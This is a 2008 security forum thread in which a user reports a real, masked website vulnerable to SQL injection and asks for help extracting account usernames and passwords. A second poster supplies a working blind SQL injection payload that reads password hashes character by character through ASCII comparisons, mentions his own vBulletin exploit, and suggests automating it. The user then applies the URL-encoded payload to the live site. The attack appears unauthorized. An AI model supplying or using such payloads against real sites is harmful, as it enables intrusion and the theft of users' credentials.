 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Help with a SQL INJECTION >> Probably BLIND ( HOW?) |
 |
 Posted: Sat Dec 27, 2008 5:45 pm |
 |
|
| ingh1pped |
| Advanced user |
 |
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
 |
|
 |
|
I have found a vulnerable site to SQL injection
http://www.+++++++/index.php?++++++++=17 union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
I say it's ok beacuse if i change table_accounts with other name like fuck_accounts or table_users , it says
Table 'example' doesn't exist
and if i change te columns with other name like for example user or pwd it says.
Unknown column 'example' in 'field list'
WELL, it' ok just beacuse i try order by 9-- and it's ok , and order by 10-- NO!
Then i know that the exact query is
union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
but when before i forced the query with -1 nothing is printed on screen
And nothing in printed on screen if i try obviously
-1 union select 1,2,3,4,5,6,7,8,9-- (no number on screen!)
nothing number , nothing of nothing but the page is correctly loaded.
Just i think then, it needs a BLIND SQL but how can i made a correct blind Query with arguments
table_accounts username password and id ?
I'm not very good boy with blind sql injection.
What i can try? What responde of the site?
THKS THKS THKS for your help!!! |
|
|
|
|
|
|
Re: Help with a SQL INJECTION >> Probably BLIND ( HOW? |
|
| Posted: Sat Dec 27, 2008 11:02 pm |
|
|
| tehhunter |
| Valuable expert |
|
|
| Joined: Nov 19, 2008 |
| Posts: 261 |
|
|
|
|
|
|
|
| ingh1pped wrote: | I have found a vulnerable site to SQL injection
http://www.+++++++/index.php?++++++++=17 union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
I say it's ok beacuse if i change table_accounts with other name like fuck_accounts or table_users , it says
Table 'example' doesn't exist
and if i change te columns with other name like for example user or pwd it says.
Unknown column 'example' in 'field list'
WELL, it' ok just beacuse i try order by 9-- and it's ok , and order by 10-- NO!
Then i know that the exact query is
union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
but when before i forced the query with -1 nothing is printed on screen
And nothing in printed on screen if i try obviously
-1 union select 1,2,3,4,5,6,7,8,9-- (no number on screen!)
nothing number , nothing of nothing but the page is correctly loaded.
Just i think then, it needs a BLIND SQL but how can i made a correct blind Query with arguments
table_accounts username password and id ?
I'm not very good boy with blind sql injection.
What i can try? What responde of the site?
THKS THKS THKS for your help!!! |
If you have SQL injection and you can make different pages load when you change the parameter you're injecting, blind sql injection is possible.
First identify different parameters you can put in regularly (e.g. index.php?id=1 and also index.php?id=2). Good, now try something like the following:
index.php?id=-1 union select 0,0,0,0,0,0,0,0,IF(ASCII(SUBSTRING(password FROM 1 FOR 1))<97,1,2) FROM table_users WHERE userid=1--
which is asking is the first char of 'password' is of ascii value less than 97. Then just change around the condition and voila you can extract hashes. I have an exploit using this working for vBulletin and its awesome. Once you figure it out, I recommend you automate it by a program. |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 28, 2008 8:32 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
wery thanks tehunter.... i'm trying your example in more case...
i try
http://www.******/index.php?com=+++++++++++&user=126&date=-1%20union%20select%200,0,0,0,0,0,0,0,IF(ASCII(SUBSTRING(password%20FROM%201%20FOR%201))%3C97,1,2)%20FROM%20[tabella]%20WHERE%20id=1--
and the page is loaded , then if i try other name of table i get an errore table not found..
then i think the blind work but i'm not very expert o f blind ...
i just try to know how make the confront with the ascii value..
sorry but can i send you a PM with the original link???  |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 78
Members: 0
Total: 78
